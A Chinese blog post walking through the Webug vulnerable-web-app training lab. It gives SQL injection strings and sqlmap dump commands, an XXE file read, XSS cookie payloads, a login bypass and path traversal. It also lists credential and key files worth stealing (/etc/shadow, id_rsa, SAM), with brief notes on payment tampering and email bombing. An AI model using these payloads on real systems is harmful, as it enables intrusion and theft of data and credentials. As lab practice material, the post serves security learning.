菜鸡的Webug之路


webug

1.显错注入

sqlmap跑

手工

注入的一般流程为:输入点–>数据库–>数据表–>数据列–>数据项

加点爆错

利用order by判断字段个数

注释掉后面内容时可用 –+ 或者 # 后者在浏览器中会进行url编码为%23

手工

正常

推断字段个数是2个

使用union 联合查询

union select 1,group_concat(schema_name) from information_schema.schemata %23   填写字段

联合

union 联合查询数据库

union select 1,group_concat(table_name) from information_schema.tables where table_schema='webug' %23 

手工

union 联合查询数据表

union select 1,group_concat(column_name) from information_schema.columns where table_name='flag' %23

联合

union 联合查询数据内容

union select 1,flag from webug.flag %23

联合

union 联合查询操作系统名

union select 1,@@version_compile_os %23

内置函数

union 联合查询数据库版本

union select 1,version() %23

内置函数

union 查询当前使用的数据库

union select 1,DATABASE() %23

联合

sqlmap

sqlmap -u “网址” 查网站的数据库、操作系统、服务器等版本信息。

sqlmap -u “网址 ” –dbs 所有的数据库

sqlmap -u “ 网址 ” -D 数据库名 –tables

sqlmap -u “ 网址 ” -D 数据库名 -T 表名 –columns

sqlmap -u “ 网址 ” -D 数据库名 -T 表名 -C 列名 –dump

2.布尔注入

手工

加单引,order by猜字段数

order by 3 爆错 字段为2

布尔

and length(database())>4%23   查询数据库名的长度 
and ascii(substr((select table_name from information_schema.tables where table_schema='webug' limit 0,1),1,1))>98%23  当前库表

sqlmap

sqlmap

7 xee

<?xml version="1.0" encoding="utf-8"?>    
<!DOCTYPE test [
    <!ENTITY xxe SYSTEM "file:///etc/passwd">]>
    <test>
    <wsw>&xxe;</wsw>
    </test>
    </!doctype>

9反射xss

xxxx/control/xss/xss_1.php?id=

10存储xss

找到留言板直接

<script>alert(document.cookie);</script>

11万能密码绕过

账号:’or 1=1 or’

密码随便

12 domxss

没有清空value

" > <script>alert(documen.cookie)</script>#

13过滤xss

<img src=1 onerror=alert(document.cookie)>

15任意文件下载

/control/filedownload/file_download.php?file=template/../../../../etc/passwd

Windows:

C:\boot.ini //查看系统版本

C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件

C:\Windows\repair\sam //存储系统初次安装的密码

C:\Program Files\mysql\my.ini //Mysql配置

C:\Program Files\mysql\data\mysql\user.MYD //Mysql root

C:\Windows\php.ini //php配置信息

C:\Windows\my.ini //Mysql配置信息

C:\Windows\win.ini //Windows系统的一个基本系统配置文件

Linux:

/root/.ssh/authorized_keys

/root/.ssh/id_rsa

/root/.ssh/id_ras.keystore

/root/.ssh/known_hosts //记录每个访问计算机用户的公钥

/etc/passwd

/etc/shadow

/etc/my.cnf //mysql配置文件

/etc/httpd/conf/httpd.conf //apache配置文件

/root/.bash_history //用户历史命令记录文件

/root/.mysql_history //mysql历史命令记录文件

/proc/mounts //记录系统挂载设备

/porc/config.gz //内核配置文件

/var/lib/mlocate/mlocate.db //全文件路径

/porc/self/cmdline //当前进程的cmdline参数

16敏感文件下载

windows下不区分大小写,linux下区分大小写

任意下载

17 文件上传(前端拦截)

javascript判断 浏览器禁用js 上传

浏览器禁用js

浏览器禁用js

浏览器禁用js

23支付漏洞

抓包

修改

修改price参数

24.邮箱轰炸

抓包

邮箱轰炸

邮箱轰炸

邮箱轰炸


文章作者: Lee Sun
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Lee Sun !
评论
 上一篇
1+x中级理论考试样题 2019 1+x中级理论考试样题 2019
前端开发是创建 Web 页面或 app 等前端界面呈现给用户的过程。前端开发通过 HTML,CSS 及 JavaScript 以及衍生出来的各种技术、框架、解决方案,来实现互联网产品的用户界面交互。Web 前端工程师,他是伴随着 web 兴起而细分进去的行业。Web 前端的岗位职责是利用 HTML、CSS、JavaScript、DOM、Flash 等各种 Web 技能结合产品的界面开发。
2019-12-19
下一篇 
b/s(浏览器与服务器)通信-ajax篇,从入门到放弃 b/s(浏览器与服务器)通信-ajax篇,从入门到放弃
浏览器与服务器之间,采用 HTTP 协议通信。用户在浏览器地址栏键入一个网址,或者通过网页表单向服务器提交内容,这时浏览器就会向服务器发出 HTTP 请求。2005年2月,AJAX 这个词第一次正式提出,它是 Asynchronous JavaScript and XML 的缩写,指的是通过 JavaScript 的异步通信,从服务器获取 XML 文档从中提取数据,再更新当前网页的对应部分,而不用刷新整个网页。后来,AJAX 这个词就成为 JavaScript 脚本发起 HTTP 通信的代名词,也就是说,只要用脚本发起通信,就可以叫做 AJAX 通信。W3C 也在2006年发布了它的国际标准
2019-09-13
  目录